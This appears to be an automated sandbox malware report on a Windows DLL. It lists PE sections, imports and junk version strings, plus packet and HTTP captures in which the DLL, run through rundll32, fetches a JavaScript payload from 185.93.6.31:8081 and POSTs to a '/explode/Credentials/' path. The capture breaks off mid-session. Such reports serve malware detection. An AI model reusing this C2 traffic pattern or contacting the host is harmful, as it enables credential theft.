              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x16880x1800False0.55419921875data5.85744345083IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .data0x30000x4c00x600False0.647135416667data5.84721957186IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .rdata0x40000x4d00x600False0.203125data3.73422898826IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .pdata0x50000x1d40x200False0.55078125data3.51485716452IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .xdata0x60000x13c0x200False0.330078125data2.72538928976IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .bss0x70000x1300x0False0empty0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .edata0x80000x520x200False0.150390625data0.911674614809IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .idata0x90000x3d00x400False0.3857421875data3.64644739475IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .CRT0xa0000x580x200False0.0546875data0.201539378135IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .tls0xb0000x100x200False0.02734375data0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .rsrc0xc0000x3480x400False0.40625data2.93565824528IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              .reloc0xd0000x600x200False0.19921875data1.04604922619IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /40xe0000x2800x400False0.1669921875data1.13971139807IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /190xf0000x6dca0x6e00False0.423828125data5.99594303113IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /310x160000x13dd0x1400False0.2556640625data4.74282532473IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /450x180000x1a940x1c00False0.43359375data5.31317935931IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /570x1a0000x6f80x800False0.34521484375data3.91434995831IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /700x1b0000x29d0x400False0.3271484375data3.73490169641IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /810x1c0000x2e730x3000False0.194742838542data2.12431889847IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
              /920x1f0000x7a00x800False0.16845703125data1.45626524275IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_VERSION0xc0780x2d0dataEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, GetModuleHandleA, GetProcAddress, InitializeCriticalSection, LeaveCriticalSection, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
              msvcrt.dll__iob_func, _amsg_exit, _initterm, _lock, _unlock, abort, calloc, free, fwrite, memmove, realloc, strlen, strncmp, vfprintf

              Exports

              NameOrdinalAddress
              gSDCSXjfiSV10x6bc01400

              Version Infos

              DescriptionData
              LegalCopyrightaJqspleKQJF
              InternalNameiPytEhMTqI
              FileVersion19.17.4.4
              CompanyNamedJkgPCXZKBkDChG
              ProductNameiPytEhMTqI
              ProductVersion17.14.16.11
              FileDescriptionTtuzAbhuOgvjXTx
              OriginalFilenameGnGmRmwtZJjkTEt.dll
              Translation0x0809 0x04b0

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 25, 2021 20:18:10.878832102 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.906856060 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.906960964 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.907609940 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.935214996 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.938972950 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.938998938 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939024925 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939045906 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939069033 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939086914 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939086914 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.939102888 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939141035 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939157009 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.939168930 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939193010 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.939205885 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.939229965 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.939275980 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965548992 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965584993 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965615988 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965657949 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965656996 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965683937 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965703011 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965708017 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965729952 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965751886 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965754986 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965775967 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965791941 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965806961 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965831041 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965840101 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965852976 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965879917 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965903997 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965905905 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965924978 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965931892 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965965986 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.965981960 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.965987921 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.966010094 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.966017962 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.966032028 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.966052055 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.966053963 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.966095924 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.993982077 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994023085 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994048119 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994070053 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994092941 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994115114 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994127989 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994137049 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994160891 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994160891 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994182110 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994206905 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994227886 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994241953 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994246960 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994249105 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994270086 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994272947 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994293928 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994316101 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994317055 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994338989 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994343996 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994360924 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994388103 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994388103 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994410038 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994425058 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994431019 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994453907 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994473934 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994483948 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994494915 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994518995 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994520903 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994539976 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994544983 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994565010 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994590044 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994592905 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994616032 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994622946 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994640112 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994657993 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994678974 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994700909 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994700909 CEST497408081192.168.2.7185.93.6.31
              Sep 25, 2021 20:18:10.994723082 CEST808149740185.93.6.31192.168.2.7
              Sep 25, 2021 20:18:10.994740963 CEST808149740185.93.6.31192.168.2.7

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 25, 2021 20:18:21.100399971 CEST5183753192.168.2.78.8.8.8
              Sep 25, 2021 20:18:21.129476070 CEST53518378.8.8.8192.168.2.7
              Sep 25, 2021 20:18:35.754415989 CEST5541153192.168.2.78.8.8.8
              Sep 25, 2021 20:18:35.774538040 CEST53554118.8.8.8192.168.2.7
              Sep 25, 2021 20:18:54.993717909 CEST6366853192.168.2.78.8.8.8
              Sep 25, 2021 20:18:55.014594078 CEST53636688.8.8.8192.168.2.7
              Sep 25, 2021 20:18:56.591945887 CEST5464053192.168.2.78.8.8.8
              Sep 25, 2021 20:18:56.637037039 CEST53546408.8.8.8192.168.2.7
              Sep 25, 2021 20:18:57.827560902 CEST5873953192.168.2.78.8.8.8
              Sep 25, 2021 20:18:57.855509996 CEST53587398.8.8.8192.168.2.7
              Sep 25, 2021 20:18:57.875310898 CEST6033853192.168.2.78.8.8.8
              Sep 25, 2021 20:18:57.895018101 CEST53603388.8.8.8192.168.2.7
              Sep 25, 2021 20:18:58.501722097 CEST5871753192.168.2.78.8.8.8
              Sep 25, 2021 20:18:58.521997929 CEST53587178.8.8.8192.168.2.7
              Sep 25, 2021 20:18:58.908339977 CEST5976253192.168.2.78.8.8.8
              Sep 25, 2021 20:18:58.926666975 CEST53597628.8.8.8192.168.2.7
              Sep 25, 2021 20:18:59.851284981 CEST5432953192.168.2.78.8.8.8
              Sep 25, 2021 20:18:59.871064901 CEST53543298.8.8.8192.168.2.7
              Sep 25, 2021 20:19:00.517580032 CEST5805253192.168.2.78.8.8.8
              Sep 25, 2021 20:19:00.541317940 CEST53580528.8.8.8192.168.2.7
              Sep 25, 2021 20:19:01.267178059 CEST5400853192.168.2.78.8.8.8
              Sep 25, 2021 20:19:01.287280083 CEST53540088.8.8.8192.168.2.7
              Sep 25, 2021 20:19:01.975260973 CEST5945153192.168.2.78.8.8.8
              Sep 25, 2021 20:19:01.999336004 CEST53594518.8.8.8192.168.2.7
              Sep 25, 2021 20:19:03.006748915 CEST5291453192.168.2.78.8.8.8
              Sep 25, 2021 20:19:03.039854050 CEST53529148.8.8.8192.168.2.7
              Sep 25, 2021 20:19:03.897259951 CEST6456953192.168.2.78.8.8.8
              Sep 25, 2021 20:19:03.917697906 CEST53645698.8.8.8192.168.2.7
              Sep 25, 2021 20:19:17.236177921 CEST5281653192.168.2.78.8.8.8
              Sep 25, 2021 20:19:17.263418913 CEST53528168.8.8.8192.168.2.7
              Sep 25, 2021 20:19:45.283788919 CEST5078153192.168.2.78.8.8.8
              Sep 25, 2021 20:19:45.309935093 CEST53507818.8.8.8192.168.2.7
              Sep 25, 2021 20:19:47.674890041 CEST5423053192.168.2.78.8.8.8
              Sep 25, 2021 20:19:47.708858967 CEST53542308.8.8.8192.168.2.7

              HTTP Request Dependency Graph

              • 185.93.6.31:8081

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.749740185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:10.907609940 CEST905OUTGET /Register/v7.19/UJCIF1N2 HTTP/1.1
              Accept: application/json, application/xhtml+xml, image/*
              Accept-Language: zh-cn
              Accept-Encoding: identity, br
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:10.938972950 CEST906INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:10 GMT
              Server: gsw
              Content-Length: 264862
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.749741185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:11.165000916 CEST1183OUTGET /Register/v7.19/UJCIF1N2 HTTP/1.1
              Accept: application/json, application/xhtml+xml, image/*
              Accept-Language: zh-cn
              Accept-Encoding: identity, br
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:11.192579985 CEST1183INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:11 GMT
              Server: gsw
              Content-Length: 264862
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              10192.168.2.749754185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:22.049355030 CEST1788OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc_1otimgQza-n-jl0HiayqIQ4CKkho9_S08EFgs-hYOJXPT7VgFOT_wmCHisrduUFPISKNpZqZ4SpRIAAr8wWdmCSVJD8sMwdEzI_i0O_RXBxC2SULTWHX1dWviirlTiJDRtT3DAwjjCZakilCECsx-qYjA0QFU7XsOTqLcKhMTkrxC
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:22.077219963 CEST1788INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:22 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              11192.168.2.749755185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:22.233043909 CEST1792OUTPOST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=KDDINCJEJFALOEKAJEAIOLKAJB HTTP/1.1
              Accept: image/*, application/xml, text/html
              Accept-Language: es-pe
              Accept-Encoding: gzip, *
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Content-Length: 11216
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:22.261562109 CEST1803INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:22 GMT
              Server: cloudflare
              Content-Length: 2298
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: plain/text; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              12192.168.2.749756185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:26.042768955 CEST1807OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
